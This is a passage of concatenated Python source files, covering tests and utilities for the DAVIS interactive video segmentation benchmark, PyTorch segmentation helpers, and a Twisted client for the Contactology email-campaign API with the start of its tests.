'sequence': 'test-sequence'
}
def dataset(subset, **samples):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
sequence_set = Davis.sets[subset]
new_set = list(samples.keys())
new_set.sort() # Necessary as the keys order is not garanteed
original = Davis.dataset.copy()
for seq in samples:
Davis.dataset[seq].update(samples[seq])
Davis.sets[subset] = new_set
result = func(*args, **kwargs)
# Recover orignal state at Davis class
Davis.sets[subset] = sequence_set
Davis.dataset = original
return result
return wrapper
return decorator
class TestDavisInteractiveSession(unittest.TestCase):
@patch.object(Davis, 'check_files', return_value=None)
def test_subset(self, mock_davis):
davis_root = '/tmp/DAVIS'
session = DavisInteractiveSession(subset='val', davis_root=davis_root)
session.__enter__()
session = DavisInteractiveSession(subset='train', davis_root=davis_root)
session.__enter__()
session1 = DavisInteractiveSession(
subset='test-dev', davis_root=davis_root)
session2 = DavisInteractiveSession(subset='xxxx', davis_root=davis_root)
with pytest.raises(ValueError):
session1.__enter__()
with pytest.raises(ValueError):
session2.__enter__()
assert mock_davis.call_count == 2
@patch.object(
LocalConnector, 'post_predicted_masks', return_value=EMPTY_SCRIBBLE)
@patch.object(LocalConnector, 'get_report', return_value=pd.DataFrame())
@patch.object(LocalConnector, 'get_scribble', return_value=EMPTY_SCRIBBLE)
@patch.object(
LocalConnector,
'get_samples',
return_value=([('bear', 2), ('bear', 1)], 5, None))
def test_interactions_limit(self, mock_start_session, mock_get_scribble,
mock_get_report, mock_submit_masks):
davis_root = '/tmp/DAVIS'
with DavisInteractiveSession(
davis_root=davis_root,
max_nb_interactions=5,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
assert mock_start_session.call_count == 1
for i in range(7):
assert session.next()
seq, scribbles, new_seq = session.get_scribbles()
assert seq == 'bear'
assert is_empty(scribbles)
if i % 5 == 0:
assert new_seq, i
session.submit_masks(None)
assert mock_get_scribble.call_count == 2
assert mock_submit_masks.call_count == 7
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
tmp_dir = Path(tempfile.mkdtemp())
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=5,
report_save_dir=tmp_dir,
max_time=None) as session:
count = 0
temp_csv = tmp_dir / ("%s.tmp.csv" % session.report_name)
final_csv = tmp_dir / ("%s.csv" % session.report_name)
while session.next():
assert not final_csv.exists()
assert temp_csv.exists()
df = pd.read_csv(temp_csv, index_col=0)
assert df.shape == (count * 2, 10)
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'bear'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
else:
assert annotated_frames(scribble) == [1]
assert not is_empty(scribble)
assert len(scribble['scribbles']) == 2
assert len(scribble['scribbles'][1]) > 0
assert len(scribble['scribbles'][0]) == 0
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
session.submit_masks(
pred_masks, next_scribble_frame_candidates=[1])
if count > 0:
assert df.sequence.unique() == ['bear']
assert np.all(df.interaction.unique() ==
[i + 1 for i in range(count)])
assert np.all(df.object_id.unique() == [1])
count += 1
assert count == 5
assert final_csv.exists()
assert not temp_csv.exists()
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 2})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=5,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
while session.next():
seq, scribble, new_seq = session.get_scribbles()
assert new_seq == (count == 0 or count == 5)
assert seq == 'bear'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 5:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 10
assert mock_davis.call_count == 0
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple_sequences(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
for seq, scribble, new_seq in session.scribbles_iterator():
assert new_seq == (count == 0 or count == 4 or count == 8)
if count < 8:
assert seq == 'bear', count
else:
assert seq == 'tennis', count
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 4:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 8:
with dataset_dir.joinpath('Scribbles', 'tennis',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.ones((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 12
df = session.get_report()
assert mock_davis.call_count == 0
assert df.shape == (2 * 4 * 2 * 1 + 4 * 2 * 2, 10)
global_summary_file = os.path.join(tempfile.mkdtemp(), 'summary.json')
summary = session.get_global_summary()
self.assertFalse(os.path.exists(global_summary_file))
self.assertTrue('auc' in summary)
self.assertTrue('metric_at_threshold' in summary)
self.assertEqual(summary['metric_at_threshold']['threshold'], 60)
np.testing.assert_almost_equal(summary['metric_at_threshold']['J_AND_F'],
0.035155)
self.assertTrue('curve' in summary)
curve = summary['curve']
self.assertEqual(len(curve['J_AND_F']), 6)
self.assertEqual(len(curve['time']), 6)
summary = session.get_global_summary(save_file=global_summary_file)
self.assertTrue(os.path.exists(global_summary_file))
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple_sequences_metric(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
metric_to_optimize='J',
max_time=None) as session:
count = 0
for seq, scribble, new_seq in session.scribbles_iterator():
assert new_seq == (count == 0 or count == 4 or count == 8)
if count < 8:
assert seq == 'bear', count
else:
assert seq == 'tennis', count
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 4:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 8:
with dataset_dir.joinpath('Scribbles', 'tennis',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.ones((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 12
df = session.get_report()
assert mock_davis.call_count == 0
assert df.shape == (2 * 4 * 2 * 1 + 4 * 2 * 2, 10)
global_summary_file = os.path.join(tempfile.mkdtemp(), 'summary.json')
summary = session.get_global_summary()
self.assertFalse(os.path.exists(global_summary_file))
self.assertTrue('auc' in summary)
self.assertTrue('metric_at_threshold' in summary)
self.assertEqual(summary['metric_at_threshold']['threshold'], 60)
np.testing.assert_almost_equal(summary['metric_at_threshold']['J'],
0.07031)
self.assertTrue('curve' in summary)
curve = summary['curve']
self.assertEqual(len(curve['J']), 6)
self.assertEqual(len(curve['time']), 6)
summary = session.get_global_summary(save_file=global_summary_file)
self.assertTrue(os.path.exists(global_summary_file))
@dataset('train', blackswan={'num_frames': 6, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single_only_last(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
annotated_frames_list = []
while session.next():
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'blackswan'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'blackswan',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
else:
assert len(annotated_frames(scribble)) == 1
a_fr = annotated_frames(scribble)[0]
assert a_fr not in annotated_frames_list
annotated_frames_list.append(a_fr)
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((6, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 4
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single_timeout(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=None,
max_time=1,
report_save_dir=tempfile.mkdtemp()) as session:
count = 0
while session.next():
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'bear'
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
time.sleep(1.2)
session.submit_masks(pred_masks)
count += 1
assert count == 1
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_report_folder_creation(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
tmp_dir = Path(tempfile.mkdtemp()) / 'test'
assert not tmp_dir.exists()
session = DavisInteractiveSession(
davis_root=dataset_dir, subset='train', report_save_dir=tmp_dir)
assert tmp_dir.exists()
assert mock_davis.call_count == 0
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_shuffle(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
shuffle=True,
report_save_dir=tempfile.mkdtemp()) as session:
assert ('bear', 1) in session.samples
assert ('bear', 2) in session.samples
assert ('tennis', 1) in session.samples
assert mock_davis.call_count == 0
```
#### File: davisinteractive/storage/local_test.py
```python
import unittest
import numpy as np
import pytest
from davisinteractive.storage import LocalStorage
class TestLocalStorage(unittest.TestCase):
def test_init(self):
storage = LocalStorage()
for c in storage.COLUMNS:
assert c in storage.report
def test_store_operation(self):
user_id = 'empty'
session_id = '12345'
sequence = 'test'
scribble_idx = 1
interaction = 1
timing = 10.34
objects_idx = [1, 2, 3]
frames = [0, 0, 0]
jaccard = [.2, .3, .4]
contour = [.8, .6, .4]
storage = LocalStorage()
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, [.1, .2, 1.0001], contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, [-.1, .2, 1], contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, [1, 1], jaccard, contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, jaccard, [-0.01, 1.0, .4])
assert storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction, timing,
objects_idx, frames, [.1, .000, 1.000], contour)
with pytest.raises(RuntimeError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, jaccard, contour)
with pytest.raises(RuntimeError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction + 2,
timing, objects_idx, frames, jaccard, contour)
assert storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction + 1,
timing, objects_idx, frames, jaccard, contour)
def test_annotated_frames(self):
session_id = 'unused'
sequence = 'bmx-trees'
scribble_idx = 1
storage = LocalStorage()
storage.store_annotated_frame(session_id, sequence, scribble_idx, 1,
False)
annotated_frames = storage.get_annotated_frames(session_id, sequence,
scribble_idx)
self.assertEqual(annotated_frames, (1,))
def test_annotated_frames_full(self):
session_id = 'unused'
sequence = 'bmx-trees'
scribble_idx = 1
nb_frames = 80
storage = LocalStorage()
for i in range(nb_frames):
storage.store_annotated_frame(session_id, sequence, scribble_idx, i,
False)
annotated_frames = storage.get_annotated_frames(session_id, sequence,
scribble_idx)
self.assertEqual(annotated_frames, tuple())
```
#### File: davisinteractive/utils/scribbles.py
```python
from __future__ import absolute_import, division
import numpy as np
from .operations import bezier_curve
from .operations import bresenham as bresenham_function
def scribbles2mask(scribbles,
output_resolution,
bezier_curve_sampling=False,
nb_points=1000,
bresenham=True,
default_value=-1):
""" Convert the scribbles data into a mask.
# Arguments
scribbles: Dictionary. Scribbles in the default format.
output_resolution: Tuple. Output resolution (H, W).
bezier_curve_sampling: Boolean. Weather to sample first the returned
scribbles using bezier curve or not.
nb_points: Integer. If `bezier_curve_sampling` is `True` set the number
of points to sample from the bezier curve.
bresenham: Boolean. Whether to compute bresenham algorithm for the
scribbles lines.
default_value: Integer. Default value for the pixels which do not belong
to any scribble.
# Returns
ndarray: Array with the mask of the scribbles with the index of the
object ids. The shape of the returned array is (B x H x W) by
default or (H x W) if `only_annotated_frame==True`.
"""
if len(output_resolution) != 2:
raise ValueError(
'Invalid output resolution: {}'.format(output_resolution))
for r in output_resolution:
if r < 1:
raise ValueError(
'Invalid output resolution: {}'.format(output_resolution))
nb_frames = len(scribbles['scribbles'])
masks = np.full(
(nb_frames,) + output_resolution, default_value, dtype=np.int)
size_array = np.asarray(output_resolution[::-1], dtype=np.float) - 1
for f in range(nb_frames):
sp = scribbles['scribbles'][f]
for p in sp:
path = p['path']
obj_id = p['object_id']
path = np.asarray(path, dtype=np.float)
if bezier_curve_sampling:
path = bezier_curve(path, nb_points=nb_points)
path *= size_array
path = path.astype(np.int)
if bresenham:
path = bresenham_function(path)
m = masks[f]
m[path[:, 1], path[:, 0]] = obj_id
masks[f] = m
return masks
def scribbles2points(scribbles_data, output_resolution=None):
""" Convert the given scribbles into a list of points and object ids.
# Arguments
scribbles_data: Dictionary. Scribbles in the default format
output_resolution: Tuple. Output resolution (H, W) to scale the
points.
If None given, the points will be floats as a fraction of height
and width.
# Returns
(ndarray, ndarray): Returns (X, Y) where X is a list of points from the
scribbles represented in the output_resolution with shape (N x 3)
with N being the total number of points on all the scribbles. The three
coordinates given correspond the the frame number, height and width,
respectively.
Y is the object id for each given point with shape (N,).
"""
scribbles = scribbles_data['scribbles']
paths, object_ids = [], []
for frame, s in enumerate(scribbles):
for l in s:
# p = l['path']
coordinates = [[frame] + point for point in l['path']]
paths += coordinates
object_ids += [l['object_id']] * len(l['path'])
paths = np.asarray(paths, dtype=np.float)
object_ids = np.asarray(object_ids, dtype=np.int)
if output_resolution:
h, w = output_resolution
img_size = np.asarray([1, h - 1, w - 1], dtype=np.float)
paths *= img_size
paths = paths.astype(np.int)
return paths, object_ids
def fuse_scribbles(scribbles_a, scribbles_b):
""" Fuse two scribbles in the default format.
# Arguments
scribbles_a: Dictionary. Default representation of scribbles A.
scribbles_b: Dictionary. Default representation of scribbles B.
# Returns
dict: Returns a dictionary with scribbles A and B fused.
"""
if scribbles_a['sequence'] != scribbles_b['sequence']:
raise ValueError('Scribbles to fuse are not from the same sequence')
if len(scribbles_a['scribbles']) != len(scribbles_b['scribbles']):
raise ValueError('Scribbles does not have the same number of frames')
scribbles = dict(scribbles_a)
nb_frames = len(scribbles['scribbles'])
for i in range(nb_frames):
scribbles['scribbles'][i] += scribbles_b['scribbles'][i]
return scribbles
def is_empty(scribbles_data):
""" Checks whether the given scribble has any non-empty line.
# Arguments
scribbles_data (dict): Scribble in the default format
# Returns
bool: Whether the scribble is empty or not.
"""
scribbles = scribbles_data['scribbles']
has_lines = [len(s) > 0 for s in scribbles]
return not any(has_lines)
def annotated_frames(scribbles_data):
""" Finds which frames have a scribble.
# Arguments
scribbles_data (dict): Scribble in the default format.
# Returns
list: Number of the frames that contain at least one scribble.
"""
scribbles = scribbles_data['scribbles']
frames_list = [i for i, s in enumerate(scribbles) if s]
return frames_list
def annotated_frames_object(scribbles_data, object_id):
""" Computes which frames have a scribble for a certain object.
# Arguments
scribbles_data (dict): Scribble in the default format.
object_id (int): Id of the object of interest.
# Returns
dict: Number of the frames that contain at least one scribble.
"""
frames_list = []
scribbles = scribbles_data['scribbles']
for ii, scribble_frame in enumerate(scribbles):
for scribble in scribble_frame:
if scribble['object_id'] == object_id:
frames_list.append(ii)
break
return frames_list
```
#### File: davisinteractive/utils/visualization.py
```python
from __future__ import absolute_import, division
import numpy as np
from PIL import ImageDraw
def _pascal_color_map(N=256, normalized=False):
"""
Python implementation of the color map function for the PASCAL VOC data set.
Official Matlab version can be found in the PASCAL VOC devkit
http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit
"""
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7 - j)
g = g | (bitget(c, 1) << 7 - j)
b = b | (bitget(c, 2) << 7 - j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap / 255 if normalized else cmap
return cmap
def plot_scribble(ax, scribble, frame, output_size=None, **kwargs):
""" Plot scribbles into an axis.
# Arguments
ax: Matplotlib Axis. Axis where to plot the scribble lines.
scribbles: Scribble. Scribble to plot.
frame: Integer. Frame of the scribble to plot.
output_size: Tuple. Image size to scale the scribble points `(H, W)`.
**kwargs: Dictionary. Additional parameters to pass at the
`ax.plot(**kwargs)` method.
# Returns
matplotlib.axis: Returns the given axis with the scribbles plotted on
it.
"""
scribbles = scribble['scribbles']
if frame >= len(scribbles):
raise ValueError('Frame value not valid')
cmap = _pascal_color_map(normalized=True)
frame_scribbles = scribbles[frame]
for line in frame_scribbles:
path, obj_id = line['path'], line['object_id']
path = np.asarray(path, dtype=np.float32)
color = cmap[obj_id]
if output_size:
img_size = np.asarray(output_size, dtype=np.float32)
img_size -= 1
path *= img_size
ax.plot(*path.T, color=color, **kwargs)
return ax
def draw_scribble(img, scribble, frame, output_size=None, width=5):
""" Draw scribbles into a PIL Image.
# Arguments
img: PIL Image. Image where to draw the scribbles.
scribbles: Scribble. Scribble to plot.
frame: Integer. Frame of the scribble to plot.
output_size: Tuple. Image size to scale the scribble points `(H, W)`.
width: Integer. Width of the drawed lines.
# Returns
PIL Image: Returns the original image `img` with the scribble draw on
it.
"""
scribbles = scribble['scribbles']
if frame >= len(scribbles):
raise ValueError('Frame value not valid')
cmap = _pascal_color_map(normalized=False)
frame_scribbles = scribbles[frame]
draw = ImageDraw.Draw(img)
for line in frame_scribbles:
path, obj_id = line['path'], line['object_id']
path = np.asarray(path, dtype=np.float32)
color = cmap[obj_id]
if output_size:
img_size = np.asarray(output_size, dtype=np.float32)
img_size -= 1
path *= img_size
path = path.ravel().tolist()
draw.line(path, fill=tuple(color), width=width)
del draw
return img
def overlay_mask(im, ann, alpha=0.5, colors=None, contour_thickness=None):
""" Overlay mask over image.
This function allows you to overlay a mask over an image with some
transparency.
# Arguments
im: Numpy Array. Array with the image. The shape must be (H, W, 3) and
the pixels must be represented as `np.uint8` data type.
ann: Numpy Array. Array with the mask. The shape must be (H, W) and the
values must be intergers
alpha: Float. Proportion of alpha to apply at the overlaid mask.
colors: Numpy Array. Optional custom colormap. It must have shape (N, 3)
being N the maximum number of colors to represent.
contour_thickness: Integer. Thickness of each object index contour draw
over the overlay. This function requires to have installed the
package `opencv-python`.
# Returns
Numpy Array: Image of the overlay with shape (H, W, 3) and data type
`np.uint8`.
"""
im, ann = np.asarray(im, dtype=np.uint8), np.asarray(ann, dtype=np.int)
if im.shape[:-1] != ann.shape:
raise ValueError('First two dimensions of `im` and `ann` must match')
if im.shape[-1] != 3:
raise ValueError('im must have three channels at the 3 dimension')
colors = colors or _pascal_color_map()
colors = np.asarray(colors, dtype=np.uint8)
mask = colors[ann]
fg = im * alpha + (1 - alpha) * mask
img = im.copy()
img[ann > 0] = fg[ann > 0]
if contour_thickness: # pragma: no cover
import cv2
for obj_id in np.unique(ann[ann > 0]):
contours = cv2.findContours((ann == obj_id).astype(
np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]
cv2.drawContours(img, contours[0], -1, colors[obj_id].tolist(),
contour_thickness)
return img
```
#### File: zisan/Seg/utils.py
```python
from __future__ import division
import torch
from torch.autograd import Variable
from torch.utils import data
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import torch.utils.model_zoo as model_zoo
from torchvision import models
# general libs
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFont
import numpy as np
import os
import copy
import cv2
import random
import glob
def ToCudaVariable(xs, volatile=False, requires_grad=False):
if torch.cuda.is_available():
return [Variable(x.cuda(), volatile=volatile, requires_grad=requires_grad) for x in xs]
else:
return [Variable(x, volatile=volatile, requires_grad=requires_grad) for x in xs]
def ToCudaPN(mask):
P = (mask == 1).astype(np.float32)
N = (mask == 0).astype(np.float32)
P = torch.unsqueeze(torch.from_numpy(P), dim=0).float()
N = torch.unsqueeze(torch.from_numpy(N), dim=0).float()
return ToCudaVariable([P, N], volatile=True)
def Get_weight(target, prev_targets, num_frames, at_least=-1):
right_end = min(filter(lambda x: x > target, prev_targets+[9999]))
if right_end == 9999:
NO_R_END = True
right_end = num_frames-1
else:
NO_R_END = False
left_end = max(filter(lambda x: x < target, prev_targets+[-9999]))
if left_end == -9999:
NO_L_END = True
left_end = 0
else:
NO_L_END = False
weight = num_frames*[1.0]
if (right_end - target) < at_least:
right_end = min(target + at_least, num_frames-1)
if (target - left_end) < at_least:
left_end = max(target - at_least, 0)
if NO_R_END: # no right end
pass # set 1.0
else:
step = 1.0 / (right_end - target)
for n,f in enumerate(range(target+1, num_frames)):
weight[f] = max(0.0, 1.0 - (n+1)*step)
if NO_L_END: # no left end
pass # set 1.0
else:
step = 1.0 / (target - left_end)
for n, f in enumerate(reversed(range(0, target))):
weight[f] = max(0.0, 1.0 - (n+1)*step)
return left_end, right_end, weight
def To_np_label(all_E, K, index):
# assume numpy input E: 1,o,t,h,w -> t,h,w
sh_E = all_E[0].data.cpu().numpy()
inv_index = [index.index(i) for i in range(K)]
E = sh_E[inv_index]
fgs = np.argmax(E, axis=0)
return fgs.astype(np.uint8)
def load_frames(path, size=None, num_frames=None):
fnames = glob.glob(os.path.join(path, '*.jpg'))
fnames.sort()
frame_list = []
for i, fname in enumerate(fnames):
if size:
frame_list.append(np.array(Image.open(fname).convert('RGB').resize((size[0], size[1]), Image.BICUBIC), dtype=np.uint8))
else:
frame_list.append(np.array(Image.open(fname).convert('RGB'), dtype=np.uint8))
if num_frames and i > num_frames:
break
frames = np.stack(frame_list, axis=0)
return frames
def load_UnDP(path):
# load dataparallel wrapped model properly 正确加载数据并行包装模型
state_dict = torch.load(path, map_location='cpu')
# create new OrderedDict that does not contain `module.` 创建不包含“module”的新OrderedDict
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k[7:] # remove `module.`
new_state_dict[name] = v
return new_state_dict
def overlay_davis(image,mask,rgb=[255,0,0],cscale=2,alpha=0.5):
""" Overlay segmentation on top of RGB image. from davis official"""
# import skimage
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
foreground = im_overlay*alpha + np.ones(im_overlay.shape)*(1-alpha) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = mask == 1
# Compose image
im_overlay[binary_mask] = foreground[binary_mask]
countours = binary_dilation(binary_mask) ^ binary_mask
im_overlay[countours,:] = 0
return im_overlay.astype(image.dtype)
def checkerboard(img_size, block_size):
width = int(np.maximum( np.ceil(img_size[0] / block_size), np.ceil(img_size[1] / block_size)))
b = np.zeros((block_size, block_size), dtype=np.uint8) + 32
w = np.zeros((block_size, block_size), dtype=np.uint8) + 255 - 32
row1 = np.hstack([w,b]*width)
row2 = np.hstack([b,w]*width)
board = np.vstack([row1,row2]*width)
board = np.stack([board, board, board], axis=2)
return board[:img_size[0], :img_size[1], :]
BIG_BOARD = checkerboard([1000, 1000], 20)
def overlay_checker(image,mask):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
# board = checkerboard(image.shape[:2], block_size=20)
board = BIG_BOARD[:im_overlay.shape[0], :im_overlay.shape[1], :].copy()
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = im_overlay[binary_mask]
return board.astype(image.dtype)
def overlay_color(image,mask, rgb=[255,255,255]):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
board = np.ones(image.shape, dtype=np.uint8) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = im_overlay[binary_mask]
return board.astype(image.dtype)
def overlay_bin(image,mask, rgb=[0,0,0]):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
board = np.ones(image.shape, dtype=np.uint8) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = [255,255,255]
return board.astype(image.dtype)
def overlay_fade(image, mask):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
# Overlay color on binary mask
binary_mask = mask == 1
not_mask = mask != 1
# Compose image
im_overlay[not_mask] = 0.4 * im_overlay[not_mask]
countours = binary_dilation(binary_mask) ^ binary_mask
im_overlay[countours,0] = 0
im_overlay[countours,1] = 255
im_overlay[countours,2] = 255
return im_overlay.astype(image.dtype)
``` |
{
"source": "jinty/van.contactology",
"score": 2
} |
#### File: van/contactology/__init__.py
```python
from __future__ import print_function
import six
from six.moves.urllib.parse import urlencode
from pprint import pformat
import json
from twisted.web.client import getPage
from twisted.internet import defer
from twisted.python import log
__version__ = "3.0"
class APIError(Exception):
"""Base class for all api errors from contactology"""
def __init__(self, code, message):
self.code = code
self.message = message
super(APIError, self).__init__("API Error: %s (%s)" % (message, code))
class Contactology(object):
"""Proxy object"""
host = "api.emailcampaigns.net"
path = "/2/REST/"
_logio = False
def __init__(self, key, useHTTPS=True):
self.key = key
self.useHTTPS = useHTTPS
def _log_query(self, method, r):
log.msg("SENT: %s: %s" % (method, pformat(r)))
return r
def __getattr__(self, name):
def call_wrapper(**args):
return self._call(name, **args)
return call_wrapper
@defer.inlineCallbacks
def _call(self, method, **kw):
if self._logio:
self._log_query(method, kw)
# serialize non-strings using json
for k, v in list(kw.items()):
if six.PY2 and isinstance(v, six.text_type):
v = v.encode('utf-8')
if not isinstance(v, str):
v = json.dumps(v)
kw[k] = v
# add our preset arguments
kw.update({'key': self.key, 'method': method})
# construct request data
postdata = urlencode(sorted(kw.items())).encode('utf-8')
schema = self.useHTTPS and 'https' or 'http'
url = '%s://%s%s' % (schema, self.host, self.path)
url = url.encode('utf-8')
headers = {b"Content-type": b"application/x-www-form-urlencoded",
b"User-Agent": b"Twisted Wrapper %s" % str(__version__).encode('utf-8')}
resp = yield getPage(url, method=b'POST', headers=headers, postdata=postdata)
# de-serialize response
resp = json.loads(resp.decode('utf-8'))
if self._logio:
log.msg("RECEIVED: %s" % pformat(resp))
# check for errors
if isinstance(resp, dict):
if resp.get('result', None) == 'error':
raise APIError(resp['code'], resp['message'])
yield defer.returnValue(resp)
if __name__ == '__main__':
from twisted.internet import reactor
from pprint import pprint
proxy = Contactology('Your API key here')
@defer.inlineCallbacks
def test():
try:
resp = yield proxy.List_Get_Active_Lists()
print(resp)
resp = yield proxy.List_Get_Active_Lists(optionalParameters={'offset': 1})
print(resp)
resp = yield proxy.List_Get_Info(listId=1)
print(resp)
finally:
reactor.stop()
reactor.callWhenRunning(test)
reactor.run()
```
#### File: contactology/tests/test_contactology.py
```python
import unittest
from cgi import parse_qsl
from twisted.trial.unittest import TestCase
from twisted.internet import defer
from mock import patch, Mock
from van.contactology import Contactology, APIError, __version__
try:
from json import dumps
except ImportError:
from simplejson import dumps
def _parse_post(callargs):
return sorted(parse_qsl(callargs['postdata'].decode('utf-8'), True, True))
class TestProxy(TestCase):
@defer.inlineCallbacks
def _call_once(self, api_key, result, method, *args, **kw):
patcher = patch('van.contactology.getPage')
getPage = patcher.start()
try:
getPage.return_value = dumps(result).encode('ascii')
proxy = Contactology(api_key)
method = getattr(proxy, method)
out = yield method(*args, **kw)
finally:
patcher.stop()
defer.returnValue((getPage, out))
@defer.inlineCallbacks
def test_list_return(self):
getPage, out = yield self._call_once('API Key', [], 'Campaign_Find')
self.assertEquals(out, [])
@defer.inlineCallbacks
def test_call_args(self):
getPage, out = yield self._call_once('API Key', [], 'Campaign_Find')
self.assertEquals(getPage.call_count, 1)
self.assertEquals(getPage.call_args, ((b'https://api.emailcampaigns.net/2/REST/',),
